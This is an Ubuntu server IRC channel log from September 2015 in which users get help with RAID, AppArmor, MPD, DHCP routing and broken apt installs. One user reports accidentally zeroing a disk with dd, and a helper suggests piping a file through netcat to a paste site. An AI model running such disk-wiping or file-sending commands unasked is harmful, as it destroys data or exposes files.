<tarpman> doesn't require using any particular session, or even any particular lightdm greeter, and the session setup/teardown scripts are right there for you to muck with
<sarnold> tarpman: sweet :)
<tarpman> the pam_mount/$HOME on tmpfs method is neat but needs a gnome-keyring patch, at least in trusty
<tarpman> (don't have a bug # handy, sorry)
<tarpman> oh, and killing all the user's remaining processes on logout is a good idea -- there are a few situations where the logind session can remain open after logout so the cgroup doesn't get cleaned up
<sarnold> sadly there's no great way to do that; best you can do is probably run pkill -u foo  a few times
<RevertToType> they'll either be powered off imporoperly or shutdown every session so that should be fine
<RevertToType> they're teaching laptops for a classroom
<tarpman> bonus points if you run them on overlayfs off a read-only medium :)
<RevertToType> hrm
<RevertToType> i was looking at porteus but the teachers are picky about some stuff
<sarnold> looks kinda neat but re-written initscripts and "modules" instead feel like it'd be moderately large hurdles to keeping it updated and keeping slight customizations
<RevertToType> it really lbegan to be
<RevertToType> i mean it's also why tiny core and others started to get obnoxious
<RevertToType> i like having a system
<RevertToType> not a pile of zip files at best
<sarnold> with what it sounds like you're building you still ought to be able to install unattended-upgrades and keep up to date with fixes..
<RevertToType> yup
<RevertToType> already setup to do that
#ubuntu-server 2015-09-03
<eatingthenight> can anyone help me out. Can i reformat a hard drive for raid autodetect to ext4 without losing the data on it?
<eatingthenight> I broke up the partion and cleared the super blocks on both of the drives
<eatingthenight> however I can't mount them now since the partion table is not a valid one you can specify
<patdk-l2> what does that even mean?
<patdk-l2> there is no such thing as raid autodetect
<patdk-l2> what is it really?
<eatingthenight> that is what fdisk -l specifies it as
<tarpman> I think he means the type code in the partition table
<patdk-l2> yes, but that has nothing to do with what is actually on that partition
<eatingthenight> yeah sorry you are right
<eatingthenight> that is just the system it's listed as
<patdk-l2> blkid
<eatingthenight> o
<eatingthenight> interesting
<eatingthenight> sudo blkid /dev/sdd1 shows type ext4
<eatingthenight> which is the one that was listing as raid auto detect in fdisk
<eatingthenight> so i should be able to just mount it?
<patdk-l2> probably
<patdk-l2> try readonly first
<eatingthenight> ugh. when i mount with sudo mount /dev/sdd1 /media/store -r -t ext4
<eatingthenight> i get a ton of checksum for ground (somenumber)
<eatingthenight> has failed
<patdk-l2> how was this setup?
<eatingthenight> haha, yeah i made this raid1 like 2 years ago. But do you mean how did i make the raid or how did i break it apart?
<patdk-l2> how the raid1 was made is important
<eatingthenight> well shit
<patdk-l2> normally raid1 are mirror images
<patdk-l2> but it has options also to not be mirrors, to increase speed
<patdk-l2> if it isn't a real mirror, you won't be able to read it without raid
<eatingthenight> I am guessing it was the default 1 for 1 setup because when i made it i had to wait a ton of time for them to sync
<patdk-l2> that is true no matter what option you pick
<patdk-l2> except raid0
<eatingthenight> o ok, alright guess i have to dig into it some more
<eatingthenight> yeah sorry it's just been so long since i set it up
<eatingthenight> thank you for the help though :)
<NemoV> hi everyone
<NemoV> when a running webserver online with several domains does it matter what your server name is? should it be one of the domains you are hosting?
<sarnold> I don't think it matters
<NemoV> hmm okay
<lordievader> Good morning.
<roo79x> hi all I'm running ubuntu server vivid, tried to setup mpd (music player daemon) for the first time ever..  everything worked but had no sound, could someone please point me to a good tutorial for beginners? thanks
<medfly> hey guys
 * RoyK is in Liverpool :)
<moneylotion> any idea how one might ssh tunnel a vpn?
<moneylotion> ipsec
<patdk-wk> what does that mean?
<moneylotion> vpn > ssh tunnel > vpn
<lordievader> moneylotion: Why do you want to do that?
<patdk-wk> again, that means nothing
<lordievader> Ipsec already does encryption.
<moneylotion> school is blocking my vpn to dynamic ip address, but not to vps server
<patdk-wk> ssh tunnel ONLY supports tcp, or does it do udp
<patdk-wk> ipsec doesn't support either
<patdk-wk> they aren't blocking ipsec, they likely are just not supported nat outside of normal tcp/udp
<moneylotion> it worked for about an hour
<lordievader> moneylotion: Are the ipsec ports open and is the protocol allowed?
<moneylotion> i can vpn in from the coffee shop
<patdk-wk> also, unless they are running an ipsec helper
<patdk-wk> only one user behind that firewall can connect to the same ipsec vpn server at a time
<patdk-wk> without confusing the crap out of it
<patdk-wk> sometimes only one user can use it at a time
<patdk-wk> depending on how horrible their firewall is
<brane_> anyone have exclusive locks on CLVM working in 14.04?
<jcastro> stokachu: yo, so I filed a bug today on our stuff: https://github.com/Ubuntu-Solutions-Engineering/openstack-installer/issues/672
<stokachu> jcastro: thanks we got it, we'll get it fixed asap
<jcastro> stokachu: do you happen to know why we have Canonical-Ltd and Ubuntu Solutions Engineering as separate github orgs?
<jcastro> I thought I was going to be clever and just find it where everything else was
<stokachu> i think when we created our teams org we didn't know about canonicalltd
 * jcastro nods
<stokachu> once lauchpad's git is on par with bzr features we'll probably move it back there
 * jcastro nods
<prudentmav> when I use adduser I want to also create /var/www/$user/public how can I do that?
<shauno> look for adduser.local in man adduser.  adduser does allow for a script to be run at the end of the process which is passed the username etc
<prudentmav> thanks
<prudentmav> any reason to chgrp www-data of public_html vs keeping it as the user?
<patdk-wk> if a cgi needs to write to it
<patdk-wk> not normally a good idea
<patdk-wk> but might be needed for say, cache or something
<patdk-wk> but really that stuff should live outside publically accessable folders
<patdk-wk> though people program stupid
<teward|web> is arm64 officially 'fully supported' yet?
<sarnold> teward|web: it doesn't look like it https://wiki.ubuntu.com/SecurityTeam/FAQ#Architectures
<teward|web> sarnold: so I should not be worried about https://bugs.launchpad.net/ubuntu/+source/nginx/+bug/1491978 ?
<ubottu> Launchpad bug 1491978 in nginx (Ubuntu) "[wily] nginx fails to install on ARM64 " [Undecided,Incomplete]
<sarnold> teward|web: depends on why it's broken, I guess. feel free to ignore it until he gets back to you with logs.
<teward|web> sarnold: I intend to :p
<teward|web> when people don't provide debug data I tell them to then move on xD
<teward|web> just glad the apport hooks that get us USABLE debug data exist
<sarnold> *nod*
<teward|web> too bad people don't leverage apport-bug /var/crash/THECRASHFILE to actually GET us debug data
<sarnold> or just 'ubuntu-bug nginx'
<sarnold> heh
<teward|web> sarnold: meh, true, but i know it makes a crash and i don't want unnecessary other superfluous data
<teward|web> :)
<sarnold> hehe :)
<qman__> account de set status '159 | Don't ask to ask a question, just ask'
<qman__> oops, ignore that
<MoPac> Hello. On a new server installation, the default "Ubuntu" boot fails (some odd characters, a "probe failed" message, and then stuck on "starting version 219"). However, choosing the second grub option, rescue/recovery mode, then "resume normal boot" works fine.
<MoPac> I'm wondering what to look for in the grub config files to make the normal boot do what the alternate boot is doing...
<sarnold> MoPac: "219" sounds like you made it to some part of userland -- that sounds like a systemd version number, to me: https://launchpad.net/ubuntu/+source/systemd
<sarnold> MoPac: I have a vague feeling that messing with grub might not help as much as you'd like
<MoPac> sarnold: Well, but the root directory is in an encrypted LUKS volume, and when the default boot has failed, I have not yet been prompted for the password
<MoPac> So I must not have gotten *all* that far..
<sarnold> MoPac: ah :D
<DalekSec> sarnold: So hello.  I have an updated package that uses openssl.  I of course use pbuilder chroots to build it against the target system.  I have the same exact package on each system, but different versions of OpenSSL of course.  Now, wily and Debian testing interact properly, but trusty-vivid can't connect with them, but they can connect with each other.  The errors I get: 1.0.1f-1ubuntu11.4:
<DalekSec> "hmac authentication error, received invalid packet could be an attack, or just corruption or a synchronization error."; 1.0.2a-1ubuntu1: "protocol version 1.150." (Should be 1.0); 1.0.2d-0ubuntu1 Works fine.
<sarnold> DalekSec: ooof, that is a beast of a problem :) is the application using the "use ..._v23() function, disable ssl2, disable ssl3" idiom in the connection setup portions?
<MoPac> sarnold: Anyway, I figure I'm sort of in luck because the "resume normal boot" in recovery mode works fine, right? Would that really be the result of a post-grub config change? If if won't work to do some kind of diff between 20_linux and 30_linux_xen, I'm out of ideas
<sarnold> DalekSec: are both endpoints configured to use the same ciphersuites?
<sarnold> MoPac: sorry, i ran out of ideas right at "encrypted root", hehe :(
<DalekSec> sarnold: I did a quick grep and didn't see those.  If I pull libssl from wily into vivid, it all works there.  I thusly presumed that it was an OpenSSL issue.
<sarnold> DalekSec: ah :) it certainly could be.. it's complicated code :(
<DalekSec> sarnold: Oh, package is CVS snapshot of gvpe.
<sarnold> DalekSec: the functions involved would be SSLv23_server_method or SSLv3_server_method, SSLv23_client_method or SSLv3_client_method
<DalekSec> sarnold: Hmm.  Not actually seeing those.
<Demon_Jester> Hey guys, I changed my default port for ssh, and I get a connection timed out when I try to ssh, people say that I use ufw to modify firewall for ssh port, but I don't see ufw on my server.
<DalekSec> sarnold: I did try rebuilding with disabling SSLv3, didn't seem to make any difference.  So far, vivid is really of no concern, but more the trusty incompatibility.  I'm not really sure what else I can privide you with.
<DalekSec> Rebuilding openssl that is.
<sarnold> DalekSec: I don't see anything obvious skimming through connection.c...
<sarnold> DalekSec: it looks like there are some configration directives that have to match identically on both peers (config_packet::chk_config()) -- what are the chances that one or the other might have different values?
<sarnold> DalekSec: if it doesn't stand out to you, it's probably best to file a bug on openssl. someone else may know what's going on, or spot it quickly..
<DalekSec> sarnold: I poked mdes laur about it, but he didn't seem to have the time and his only idea was to recompile OpenSSL without SSLv3 support.  Yes the config must match, and it does down to line breaks.
<sarnold> DalekSec: that error messageis near a compression config #ifdef.. I get the impression that gvpe is doing its own compression and not using openmssl's compression, but that might be one more thing to check
<sarnold> DalekSec: I thuoght we'd disabled compression in openssl on all releases, but I could be wrong..
<DalekSec> sarnold: All changelogs have 'Disable compression to avoid CRIME systemwide', and a quick grep of 'compress' in debian/ -R shows the same for all 3 versions.  Thanks for that idea.
<sarnold> DalekSec: thanks for checking. it was a longshot anyway :/
<DalekSec> (-Ri to be precise.)  Hey no, thanks.  And thanks for all the help so far!
<DalekSec> More progress than I've made otherwise.
<DalekSec> sarnold: FWIW, I'm using a cvs snapthot as the version in Ubuntu as tiny keysizes, such that it's not really secure.  The snapshot is protocol incompatible, but that doesn't matter if you are running the snapshot on all systems.  The reason there isn't a release, upstream was going to add curve support (IIRC), so yet another protocol breakage and he didn't want to do that twice.  Otherwise he says
<DalekSec> it's fine to run it.  I have the packaging in git if that'd help, and a csv â git repo of upstreams code too.  I didn't go to the openssl channel as I presume they'll want me to just use a current version of openssl, and I'm sure that won't get backported. :P  Anywho, thanks again for all the help, even if the problem isn't fixed it's great to have someone else take a look at it. :)
<sarnold> DalekSec: hmm, I -was-  cheating a bit and just using the sources.debian.net archive...
<sarnold> but those changes might be significantnenough
<DalekSec> https://bitbucket.org/unit193/gvpe/src is upstream, and I can send you a link of the packaging vcs too if needed.
<sarnold> oh that feel smuch less archaic than the viewvc thing.. :)
<sarnold> thanks
<DalekSec> Indeed.  Of course.
<DalekSec> (There's http://loki.unit193.net/cgit/users/unit193/gvpe.git/, but that shouldn't matter.)
<sarnold> DalekSec: I'm not spotting anything here, either :/; it all looks normal enough..
<DalekSec> Dang.  Well thanks for trying!
<sarnold> good luck :)
<DalekSec> Well, in this case it's been cheat: Vivid gets wily's libssl, trusty sadly gets no connection.
<sarnold> :(
#ubuntu-server 2015-09-04
<Sander^home> Do anyone know how apparmor automatic profile generation work? I guess its based on tracing the program while it runs?
<Sander^home> Wondring how hard it would be to make apparomor read the source code to generate profiles.
<jjohansen1> Sander^home: correct, a basic profile is loaded and attached to the application in question
<jjohansen1> the profile is put into complain mode
<jjohansen1> in that mode, every access violation that would have resulted in a denial will be allowed and logged
<jjohansen1> Sander^home: a basic pass at reading source code isn't too hard, Novell had a development version of the tools that did just that
<jjohansen1> it never made it out of the Novell open sourcing of apparmor though
<Sander^home> jjohansen1: problem is that some programs would access certial resources at an unknown point in time, which makes it not very accurate, I guess thats why people disables apparomor as soon as they tune settings in a server program.
<jjohansen1> how that worked is it would build the basic profile based on a binary analysis and load that, and then load it in complain mode
<jjohansen1> Sander^home: yep, its a known problem, some one just needs the time to work on it
<jjohansen1> Sander^home: its a little harder than trivial because you need to trace back the args for certain calls to reconstruct what is being passed to them, and you can only do the analysis for stuff that leads to static data
<jjohansen1> but I remember it was well worth doing
<jjohansen1> I would love to see something like that surface again
<Sander^home> jjohansen1: If you do an source code analysis on dynamic binaries aswell?
<jjohansen1> Sander^home: you could, you could have modules for different languages, python, bash, ...
<Sander^home> And then you could basicly say that you want to run ubuntu with all apps running fully inside apparmor profiles.
<jjohansen1> for interpreted languages
<jjohansen1> and use the llvm libs to do all kinds of code analysis for the compiled languages it supports
<sarnold> though fully-automatic does potentially lead to writing profiles that fully allow bugs..
<jjohansen1> you don't have to use the llvm libs but they do so much heavy lifting for you I see no reason not to
<Sander^home> You could even do it for compiled languages, as you have everything analyzed when you install a binary (auto downloads the source too).
<jjohansen1> sarnold: sure, you still have to audit the profiles
<jjohansen1> Sander^home: I wouldn't ship/use a profile for something without auditing the profile
<jjohansen1> autogenerated is great and everything, but its pretty useless if the generated analysis a trojan horse and gives it the access it wants but should not have
<Sander^home> As long as you have a finite set of dependencies of source code (then you wont come up in the stop problem), and basicly interprets each programming languages use of external resources.
<sarnold> heck, ackermann function or snowball function are good exercises in very finite and still very difficult to decide if they'll terminate..
<Sander^home> jjohansen1: Thats true. You have to assume something. Have there been found many viruses which have been allowed into the ubuntu official deb mirror?
<sarnold> there's several, every now and then someone mails us to ask about them.. let me see if I can find a list of the viruses we ship.
<sarnold> Sander^home: here's a list of some of the viruses we ship; I'm not sure how well it's kept up to date, but it should be a good starting point http://bazaar.launchpad.net/~ubuntu-security/ubuntu-cve-tracker/master/view/head:/README.virus
<Sander^home> jjohansen1: Anyway. I'm just thinking that eg. firefox could implement more tight security, eg. with seccomp (which chromeos have, and firefoxos have for some apps.)
<Sander^home> jjohansen1: sarnold its kinda interesting how seccomp is used to restrict access to certian kernel resources, so that you cant break out of a chromeos browser tab.
<Sander^home> Wondering what system call apparomor uses.
<sarnold> Sander^home: seccomp and apparmor are in many ways orthogonal; seccomp is wonderful for removing vast portions of the kernel's userspace interface, to reduce the chances that a userspace program can exploit a broken kernel interface
<sarnold> Sander^home: apparmor applies policies to objects in the kernel that aer sometimes quite deep in the kernel execution paths, because that's where it makes most sense to apply those access controls.
<sarnold> Sander^home: so while you can turn off specific capabilities for a process using apparmor, for example. it's turned off at the point that the kernel code calls capable() -- seccomp can outright disable the entire system call, which in the case of privileged system calls, can prevent exploiting flaws in the kernel code before the capable() checks
<sarnold> Sander^home: .. or, seccomp could be more fine-grained for some cases, to e.g. disable one system call specifically that would require disabling potentially many more interfaces with apparmor's capabilities
<Sander^home> sarnold: so I guess seccomp is designed for browsers and apps with plugins?
<sarnold> Sander^home: because seccomp policies can only be installed on processes that have set the NO_NEW_PRIVS flag, and that prevents LSM domain transitions, the composition of apparmor and seccomp is more complicated than I'd like. It'd be nice if e.g. a browser would run its html engine and image decoding in different processes, with seccomp restrictions appropriate to each, and apparmor profiles appropriate to each, but that's qui
<sarnold> Sander^home: that's certainly the easiest place to apply it, but it can be used for many more thinsg
<Sander^home> sarnold: the chrome browser uses diffrent processes for each tab.
<Sander^home> firefox hasnt implemented that kind of security after what I know.
<sarnold> Sander^home: yes, I sure wish firefox had done that years ago.. *sigh*
<patdk-l2> I wish more than one cpu core could be used
<sarnold> heh, tired of firefox only taking 100% of your cpu? :)
<patdk-l2> ever
<patdk-l2> I keep wondering why firefox *pauses* for minutes at a time
<patdk-l2> cause some other tab is using 100% cpu
<patdk-l2> and if that isn't the problem, firefox is using 30+gigs of ram
<sarnold> my annoyance is trying to do plain text search with plain text downloads that might only be one megabyte in size.. whatever they're doing for grep is slower than molasses
<Sander^home> I heard something that vivaldi, by former opera ceo, uses processes for tabs. But I cant remember fully.
<sarnold> is vivaldi the opera based on blink? it probably would do tabs in processes too
 * patdk-l2 wonders why people keep spamming abuse@
<FritzTechs> Hello?
<Norbin> harro
<lordievader> Good morning
<roo79x>  hi all I'm running ubuntu server vivid, tried to setup mpd (music player daemon) for the first time ever..  everything worked but had no sound, could someone please point me to a good tutorial for beginners? thanks
<lordievader> roo79x: Is PA installed or are you using Alsa?
<roo79x> alsa
<lordievader> Does Alsa work?
<roo79x> how do I test on server please?
<lordievader> roo79x: aplay /usr/share/sounds/alsa/Front_Center.wav
<roo79x> ok thanks, will have to buy speaker for server first will do that and return, MPD might not be a good thing for beginners very very limited information on net for dummies like me lol
<roo79x> thanks for the help bye
<lordievader> roo79x: What are you trying to do?
<roo79x> just stream my music from my server to any device anywhere so me and my friends listen to music
<lordievader> roo79x: Oh, then you want to use icecast or something as a sink, not Alsa.
<roo79x> icecast? i thought only radio stations used that
<lordievader> Icecast lets you set up an internet radio station, yes.
<shauno> I ran into a similar problems with mpd+alsa.  turns out it was simply muted.
<lordievader> Alsa is for local playback, not for streaming.
<roo79x> maybe ftp easier, I was told mpd was easy by a linux "guru" this is the page he told me to use http://darylwinsinger.blogspot.com.au/2012/09/installing-mpd-on-ubuntu-server.html
<lordievader> Ftp for audio? No.
<jamespage> coreycb, hey - for future reference, I don't think bandit is used during unit testing
<jamespage> tox has specific targets for that in the os projects
<jamespage> so we can probably push that out of main
 * url just got sent here via the main #ubuntu
<url> i'm in LTSP but they are kinda quiet
<url> wanted to ask if anyone here has any experience with pinet/LTSP
<url> i'm having difficulties trying to access CUPS in the chroot, despite adding root to the lpadmin group
<roo79x> ok I'm back ended up removing mpd as it's far to complicated for a dummy like me and the info on google is old or I don't understand any of it, will stick to ftp and samba. tried aplay /usr/share/sounds/alsa/Front_Center.wav just gave errors. even the mpd website is hard to fathom
<lordievader> roo79x: It is clear you do not under stand mdp ;)
<roo79x> I couldn't even get sonata on my xubuntu laptop to connect to mpd on my server
<lordievader> That is likely a firewall issue.
<roo79x> never setup firewall on any of my linux pcs
<lordievader> roo79x: Then it might be that mdp wasn't listening to any external interfaces.
<roo79x> maybe someone with better knowledge should do a dummies guide to mpd. I set bind to address to any
<roo79x> thanks anyways for great help kudos! will install emby-server maybe
<pragomer1> do you think I could install ubuntu-server on a synology-nas ?
<pragomer1> or are there any nas-hardware that I can install ubuntu-server on?
<url> i sue the virtualization station on a qnap NAS
<url> otherwise i think you need to use OpenNAS
<url> sorry - freeNAS
<pragomer1> url: I wanted to use ubuntu-server... but just looking for a good hardware-piece
<rbasak> smoser: (minor) https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1491532
<ubottu> Launchpad bug 1491532 in openssh (Ubuntu) "ssh-keygen invocation difficult to copy-paste" [Undecided,New]
<rbasak> smoser: I had noticed that too
 * CiPi Hello world
<lordievader> o/
<smb> zul, jamespage, not sure who I should be talking to, but after a Xen update I uploaded to wily yesterday, the armhf nova-compute ci-test seems to be in fail... though maybe not since then but even sooner... apparently since Wednesday even...
<zul> link
<zul> ?
<smb> zul, http://autopkgtest.ubuntu.com/packages/n/nova/wily/armhf/
<smoser> rbasak, i'd noticed that too
<smb> zul, not quite sure this is anybodies fault... looks a bit err unstable
<smoser> but its still loads better than any other OS (where it doesnt exist)
<zul> coreycb: mysql thingy ^^^
<zul> coreycb: wait nm
<zul> jamespage: can you have a peak?
<jamespage> zul, Processing triggers for systemd (225-1ubuntu1) ...
<jamespage> Failed to execute operation: Connection timed out
<jamespage> dpkg: error processing package systemd (--configure):
<jamespage>  subprocess installed post-installation script returned error exit status 1
<jamespage> smb, it looks like that systemd update is causing problems
<smb> jamespage, oh ok... in which of the files is that found
<jamespage> smb, oh - wait not any more
<smb> jamespage, I just noticed that the last fail is diffrent
<smb> yeah that
<jamespage> nova-compute-daemons FAIL non-zero exit status 1
<smb> jamespage, right... just not sure whether those fail because of the xen update or fail because before the testing just did not get that far due to other issues
<jamespage> smb, the test installs the following packages:
<jamespage> DAEMONS=('nova-compute-kvm' 'nova-compute-lxc' 'nova-compute-qemu')
<jamespage> and then checks that nova-compute is running after each iteration
<smb> jamespage, Oh so I really could be innocent as far as I only triggered it to be run again because of reverse dependencies...
<smb> Changing xen I would suspect should only affect nova-compute-xen which is not tried. Not that it would be that simple (not sufficient to only install the nova part as one needs to make the host xen which at least requires a reboot)
<hallyn> zul: smb doing any libvirt work today?
<smb> hallyn, nope
<zul> hallyn: nope
<zul> hallyn: juju
<hallyn> k
<rbasak> jgrimm: https://bugs.launchpad.net/ubuntu/+source/openhpi/+bug/1488453
<ubottu> Launchpad bug 1488453 in openhpi (Ubuntu) "Package postinst always fail on first install when using systemd" [High,Confirmed]
<rbasak> jgrimm: https://bugs.launchpad.net/charms/+source/hacluster/+bug/1479661
<ubottu> Launchpad bug 1479661 in hacluster (Juju Charms Collection) "hacluster install hook fails on Vivid and Wily (pacemaker /var/lib/heartbeat home dir ownership issue)" [High,Triaged]
<wiuempe> hello, anyone can help me with iptables or network configuration?
<wiuempe> i have bridge and on this prodge ip aliases
<wiuempe> on this ip i have 2 virtual machines on xen
<wiuempe> this is public ip and i can connect to ssh from internet, but from hypervisor i cannot connect...
<wiuempe> from hypervisor i can only ping
<jamespage> zul, around still? did you help coreycb with the switch from pymysql -> mysqldb in sqlalchemy?
<zul> jamespage: i uploaded packages for coreycb but he did most of the work
<jamespage> zul, I have an alternative approach to using pymysql over mysqldb in sqlalc
<jamespage> we switch the default dialect, rather than overriding mysqldb with pymysql
<zul> oh...can i see?
<jamespage> this lets users still use mysqldb instead
<jamespage> zul, http://paste.ubuntu.com/12274472/
<jamespage> zul, does that make sense? I hacked that into a deployed system and it works fine afaict
<zul> jamespage: that looks ok to me, but coreycb is the expert
<jamespage> zul, going to switch it as it will help unblock testing a bit - I'll catchup with coreycb on tuesday
<zul> jamespage,  ok with me
<shadeslayer> curious, does anyone know if accelerated X11 is possible over xrdp?
<larsi> with crontab can I use both 7 and 0 for sunday?
<larsi> seems like 0 is just kept for portability
 * CiPi Hello world again :D
<bananapie> I just killed the first 1mb of my hard disk (dd if=/dev/zero of=/dev/sda bs=1024 count=1024 )
<bananapie> The computer is still running and the partitions on sda are still mounted
<bananapie> Is there anyway to save the computer?
<sarnold> not really
<sarnold> at some point in the future things are going to start going very badly very quickly and there won't be any real recovery from that.
<sarnold> things might look fine for a while and you might even be able to copy off some data you care about and don't want to rely on your backups to recover..
<genii> The only thing you could really do now is rsync everything off
<sarnold> but sooner or later you're going to need a directory structure stored in that megabyte and a kernel panic is the likely outcome..
<bananapie> There is no data, everything is backed up. but it took forever to get it running how I wanted.
<sarnold> if you're extremely lucky you'll have used scp or rsync recently enough that their contents are cached in memory and you won't have to hit the disk to get it..
<bananapie> to be fair, I typed 'sudo' before the command. So it was my own darned fault.
<bananapie> thanks anyways.
<bananapie> ok. I ran fdisk /dev/sda, recreated the partition table from memory ( my memory ). I ran dpkg-reconfigure grub-pc
<bananapie> Rebooted.
<bananapie> And it works :D
<genii> might want to fsck
<bananapie> yes. definitely.
<bananapie> can I fsck on a partition mounted read only?
<genii> yep
<genii> bananapie: If fsck makes any changes to the read only mount, reboot before mounting it read/write again
<bananapie> kk
<bananapie> How's the war with the Wraith going genii?
<genii> Heh
<bananapie> ;)
#ubuntu-server 2015-09-05
<lordievader> Good morning.
<Aison> hello
<Aison> I upgraded trusty to vivid and since then dhcp is no longer working correctly
<Aison> i'm not sure if it is a problem of the server or the client
<bekks> haison ;)
<Aison> bekks, :)
<Aison> the clients no longer set the default route
<Aison> as long as the server sends rfc3442-classless-static-routes, the clients set no default route
<Tyreal12> could someone please help me, i'm attempting to install sysv-rc-conf onto my ubuntu server 14.04 32 bit and the message i get is package sysv-rc-conf is not available
<Tyreal12> i am able to ping good via url so the server is connected to the internet
<Tyreal12> google*
<TJ-> Tyreal12: what does "apt-cache policy sysv-rc-conf" report?
<Tyreal12> installed none , candidate non
<Tyreal12> none*
<TJ-> Tyreal12: Please pastebin the entire output of that command
<Tyreal12> sysv-rc-conf :
<Tyreal12>    Installed: (none)
<Tyreal12>    Candidate: (none)
<Tyreal12>    Version table:
<Tyreal12> is that what you mean?
<Aison> I found the reason: "If the DHCP server returns both a Classless Static Routes option and a Router option, the DHCP client MUST ignore the Router option."
<Aison> this restriction is old, but most dhcp clients did not follow it
<TJ-> Tyreal12: If there are no versions listed that means you didn't correctly install Ubuntu, and there is no valid "/etc/apt/sources.list"
<Tyreal12> you're right, hmmmm i guess i shall attempt to reinstall again
<Tyreal12> when installing ubuntu server 14.04 do i just want the OpenSSH server?
<Norbin> who knows what you want Tyreal12? :/
<Norbin> you might want LAMP etc...
<Norbin> all up to you
<Norbin> u can start with openssh and install others later on manually
<Tyreal12> ok cool, that was the question i should've asked
<Tyreal12> i went away and thought about it and it was a bit of a silly question
<Tyreal12> i would just like to say thankyou for all of your help i have it set up with lamp
<Tyreal12> is it possible to install a gui to the ubuntu server 14.04 if so could someone suggest one
<lordievader> Tyreal12: It's possible but not frequently done.
<bekks> Tyreal12: Is that a server on the internet?
<Tyreal12>  may i ask why
<Tyreal12> it is connected to the internet yes
<Norbin> Tyreal12 sudo apt-get install ubuntu-desktop.... but.... can't recommend it
<bekks> Tyreal12: Is it located at your home?
<lordievader> Tyreal12: Because servers are generally headless. thus the gui would rarely be seen.
<Tyreal12> aaahk fair enough
<Tyreal12> i was wanting to set up a gui and be able to remote access it
<bekks> Tyreal12: Is it located at your home?
<Norbin> ssh all the way
<Tyreal12> yes bekks
<bekks> Tyreal12: So just install a desktop environment, and use something like freenx
<Tyreal12> i'm getting dependency errors
<lordievader> Tyreal12: Could you pastebin those?
<Tyreal12> i'm not entirely sure on what you mean by pastebin
<lordievader> !pastebin
<ubottu> For posting multi-line texts into the channel, please use http://paste.ubuntu.com | To post !screenshots use http://imgur.com/ !pastebinit to paste directly from command line | Make sure you give us the URL for your paste - see also the channel topic.
<Tyreal12> reading package lists.... done
<Tyreal12> building dependency tree
<Tyreal12> reading state information... done
<Tyreal12> some packages could not be installed. this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packes have not yet been created or been moved out of incoming.
<Tyreal12> the following information may help to resolve the situation:
<Tyreal12> ubuntu-desktop : depends: eog but it is not going to be installed
<Tyreal12>                  depends: gedit but it is not going to be installed
<Tyreal12>                  depends: language-selector-gnome but it is not going to be installed
<Tyreal12>                  depends:lightdm
<Tyreal12> and it goes on more
<Tyreal12> did yand at the end it says unable to correct problems, you have help broken packages
<lordievader> That is why I asked you to pastebin the output, prevents spamming the channel. (You could install pastebinit for that).
<lordievader> Tyreal12: Can you install lightdm?
<Tyreal12> no i can't
<Tyreal12> that is miss libglib2.0-bin
<lordievader> Tyreal12: Check if that package is available.
<Tyreal12> fixed it and its installing now
<TJ-> Tyreal12: All the problems you're having with these installs suggests there is some much larger problem - none of these issues should or do normally happen
<Tyreal12> so will i be able to have the server as an ftp as well as be able to remote access it
<Tyreal12> your'
<Tyreal12> you're right there, however i'm slowly fixing them TJ however i really do appreciate all of your help
<lordievader> Tyreal12: You are running Trusty right? How does your /etc/apt/sources.list look like? (Pastebin ;) )
<Tyreal12> i do believe i am, i shall check once lightdm finishes installing
<TJ-> Tyreal12: I'm wondering if the install media is faulty; the previous install there was no sources.list and no DNS resolution
<lordievader> Err, wut? That doesn't sound right indeed.
<TJ-> lordievader: Right, it was very weird.
<Tyreal12> yep all trusty
<lordievader> Tyreal12: Now I'd like to see your sources.list
<TJ-> Tyreal12: does the PC have full internet connectivity with DNS now?
<Tyreal12> it does tj
<Tyreal12> i can access the lamp via its domain
<Tyreal12> lord that might take be a bit to type
<lordievader> Tyreal12: Hence the pastebin utility: cat /etc/apt/sources.list | pastebinit
<TJ-> Tyreal12: If you can "sudo apt-get install pastebinit" that command can send text to a pastebin automatically
<Tyreal12> yeah i'm seriously thinking i have a bad disc
<Tyreal12> everything i
<Tyreal12> download is coming up with errors in it
<TJ-> Tyreal12: if you cannot install pastebinit due to system problems, you can do it manually with "cat /etc/apt/sources.list | nc termbin.com 9999"
<TJ-> Tyreal12: I think your network gateway is wrongly configured, or there is some HTTP proxy / MITM
<Tyreal12> #
<Tyreal12> # deb cdrom:[Ubuntu-Server 14.04.3 LTS _Trusty Tahr_ - Beta i386 (20150805)]/ trusty main restricted
<Tyreal12> #deb cdrom:[Ubuntu-Server 14.04.3 LTS _Trusty Tahr_ - Beta i386 (20150805)]/ trusty main restricted
<Tyreal12> # See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
<Tyreal12> # newer versions of the distribution.
<Tyreal12> deb http://au.archive.ubuntu.com/ubuntu/ trusty main restricted
<Tyreal12> deb-src http://au.archive.ubuntu.com/ubuntu/ trusty main restricted
<Tyreal12> ## Major bug fix updates produced after the final release of the
<Tyreal12> ## distribution.
<Tyreal12> deb http://au.archive.ubuntu.com/ubuntu/ trusty-updates main restricted
<Tyreal12> deb-src http://au.archive.ubuntu.com/ubuntu/ trusty-updates main restricted
<Tyreal12> ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
<Tyreal12> ## team. Also, please note that software in universe WILL NOT receive any
<Tyreal12> ## review or updates from the Ubuntu security team.
<Tyreal12> deb http://au.archive.ubuntu.com/ubuntu/ trusty universe
<Tyreal12> deb-src http://au.archive.ubuntu.com/ubuntu/ trusty universe
<Tyreal12> deb http://au.archive.ubuntu.com/ubuntu/ trusty-updates universe
<Tyreal12> deb-src http://au.archive.ubuntu.com/ubuntu/ trusty-updates universe
<Tyreal12> ## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
<Tyreal12> ## team, and may not be under a free licence. Please satisfy yourself as to
<Tyreal12> ## your rights to use the software. Also, please note that software in
<Tyreal12> ## multiverse WILL NOT receive any review or updates from the Ubuntu
<Tyreal12> ## security team.
<Tyreal12> deb http://au.archive.ubuntu.com/ubuntu/ trusty multiverse
<Tyreal12> deb-src http://au.archive.ubuntu.com/ubuntu/ trusty multiverse
<Tyreal12> deb http://au.archive.ubuntu.com/ubuntu/ trusty-updates multiverse
<Tyreal12> deb-src http://au.archive.ubuntu.com/ubuntu/ trusty-updates multiverse
<Tyreal12> ## N.B. software from this repository may not have been tested as
<Tyreal12> ## extensively as that contained in the main release, although it includes
<Tyreal12> ## newer versions of some applications which may provide useful features.
<Tyreal12> ## Also, please note that software in backports WILL NOT receive any review
